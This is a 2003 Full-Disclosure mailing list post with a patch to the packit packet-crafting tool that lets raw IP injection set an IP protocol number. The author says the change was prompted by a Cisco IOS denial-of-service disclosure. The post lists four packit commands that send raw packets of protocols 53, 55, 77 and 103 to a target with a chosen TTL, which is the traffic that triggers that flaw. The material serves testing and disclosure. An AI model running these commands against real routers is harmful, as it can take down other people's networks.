[Full-Disclosure] Cisco IOS vul patch for packit 0.6.0c

Darren Bounds Fri, 18 Jul 2003 12:03:01 -0700

Hi all,

Unfortunately I forgot to add a packit option to specify an IPPROTO
number with RAWIP injection mode. I've attached a patch for 0.6.0c which
solves that. The release version on packit.sourceforge.net will be
updated in a few minutes.


The following commands can be used to generate the necessary traffic
types:

packit -t RAWIP -V 53 -d dst_ip -T ttl
packit -t RAWIP -V 55 -d dst_ip -T ttl
packit -t RAWIP -V 77 -d dst_ip -T ttl
packit -t RAWIP -V 103 -d dst_ip -T ttl


Please use it wisely.


Thanks,
-- 

Darren Bounds
Security Consultant
Information Security Services
Intrusense Inc.

--
Intrusense - Securing Business As Usual

diff -ur packit-0.6.0c/ChangeLog packit-0.6.0d/ChangeLog
--- packit-0.6.0c/ChangeLog	2003-06-03 17:31:54.000000000 -0400
+++ packit-0.6.0d/ChangeLog	2003-07-18 11:52:12.000000000 -0400
@@ -1,3 +1,8 @@
+0.6.0d  Darren Bounds <[EMAIL PROTECTED]>
+----------------------------------------------
+Injection
+    - Just added the -V option for RAWIP injection to allow you to specify an IP protocol number (brought on by the recent Cisco IOS DoS posting)
+
 0.6.0c  Darren Bounds <[EMAIL PROTECTED]>
 ----------------------------------------------
 General
diff -ur packit-0.6.0c/include/inject.h packit-0.6.0d/include/inject.h
--- packit-0.6.0c/include/inject.h	2003-06-03 17:29:18.000000000 -0400
+++ packit-0.6.0d/include/inject.h	2003-07-18 11:48:54.000000000 -0400
@@ -47,6 +47,7 @@
 u_int8_t *payload;
 u_int8_t *s_d_port;
 u_int8_t hwaddr_p[17];
+u_int8_t t;
 
 struct timeval bf_pcap;
 struct timeval af_pcap;
diff -ur packit-0.6.0c/src/main.c packit-0.6.0d/src/main.c
--- packit-0.6.0c/src/main.c	2003-05-29 21:40:48.000000000 -0400
+++ packit-0.6.0d/src/main.c	2003-07-18 12:02:51.000000000 -0400
@@ -209,7 +209,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: TCP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_TCP;
+                    t = ip4hdr_o.p = IPPROTO_TCP;
                     injection_type = ETHERTYPE_IP;
                     opts = "a:b:c:d:D:e:E:fF:hH:i:n:p:q:s:S:T:O:u:U:vw:W:";
                 }  
@@ -218,7 +218,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: UDP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_UDP;
+                    t = ip4hdr_o.p = IPPROTO_UDP;
                     injection_type = ETHERTYPE_IP;
                     opts = "b:c:d:D:e:E:fhH:i:n:O:p:s:S:T:U:vw:";
                 }
@@ -227,7 +227,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: ICMP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_ICMP;
+                    t = ip4hdr_o.p = IPPROTO_ICMP;
                     injection_type = ETHERTYPE_IP;
                     opts = "b:c:C:d:e:E:fg:G:hH:i:j:J:k:K:l:L:m:M:n:N:o:O:p:P:s:Q:t:T:U:vw:y:z:"; 
                 }
@@ -240,7 +240,7 @@
                     fprintf(stderr, "\nError: ARP injection is not yet supported on this OS platform.\n");
                     exit(FAILURE);
 #endif
-                    injection_type = ETHERTYPE_ARP;
+                    t = injection_type = ETHERTYPE_ARP;
                     opts = "A:b:c:r:R:e:E:i:o:p:s:S:U:vx:X:";
                 }
                 else if(!strncasecmp(optarg, "RAWIP", 3)) 
@@ -248,9 +248,9 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: raw IP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_RAW;
+                    t = ip4hdr_o.p = IPPROTO_RAW;
                     injection_type = ETHERTYPE_IP;
-                    opts = "b:c:d:e:E:f:i:n:O:p:s:T:U:vw:";
+                    opts = "b:c:d:e:E:f:i:n:O:p:s:T:U:vV:w:";
                 }
                 else 
                 {
@@ -264,7 +264,7 @@
             default:
                 optind--;
 
-                ip4hdr_o.p = IPPROTO_TCP;
+                t = ip4hdr_o.p = IPPROTO_TCP;
                 injection_type = ETHERTYPE_IP;
                 opts = "a:b:c:d:D:e:E:fF:hH:i:n:p:q:s:S:T:O:u:U:vw:W:";
 
@@ -555,6 +555,10 @@
             case 'u':
                 thdr_o.urp = (int)atoi(optarg);
                 break;
+
+            case 'V':
+                ip4hdr_o.p = (u_int16_t)atoi(optarg);
+                break;
  
             case 'v':
                 verbose = 1;
diff -ur packit-0.6.0c/src/shape_ipv4_hdr.c packit-0.6.0d/src/shape_ipv4_hdr.c
--- packit-0.6.0c/src/shape_ipv4_hdr.c	2003-05-29 21:40:48.000000000 -0400
+++ packit-0.6.0d/src/shape_ipv4_hdr.c	2003-07-18 11:50:44.000000000 -0400
@@ -78,8 +78,8 @@
         ip4hdr_o.sum,
         ip4hdr_o.n_saddr,
         ip4hdr_o.n_daddr,
-        (ip4hdr_o.p == IPPROTO_RAW) ? payload : NULL,
-        (ip4hdr_o.p == IPPROTO_RAW) ? payload_len : 0,
+        (t == IPPROTO_RAW) ? payload : NULL,
+        (t == IPPROTO_RAW) ? payload_len : 0,
         pkt_d,
         0) == -1)
     {
diff -ur packit-0.6.0c/src/usage.c packit-0.6.0d/src/usage.c
--- packit-0.6.0c/src/usage.c	2003-05-31 18:39:19.000000000 -0400
+++ packit-0.6.0d/src/usage.c	2003-07-18 12:00:29.000000000 -0400
@@ -120,6 +120,7 @@
     fprintf(stdout, "  -o tos      Type of service\n");
     fprintf(stdout, "  -s address  Source address\n");
     fprintf(stdout, "  -T ttl      Time to live (Default: 128)\n");
+    fprintf(stdout, "  -V ipproto  IP protocol number (RAWIP only)\n");
     fprintf(stdout, "\n"); 
 
 #ifndef MACOS 
diff -ur packit-0.6.0c/VERSION packit-0.6.0d/VERSION
--- packit-0.6.0c/VERSION	2003-06-03 17:14:15.000000000 -0400
+++ packit-0.6.0d/VERSION	2003-07-18 11:52:17.000000000 -0400
@@ -1 +1 @@
-0.6.0c
+0.6.0d

[Full-Disclosure] Cisco IOS vul patch for packit 0.6.0c

Reply via email to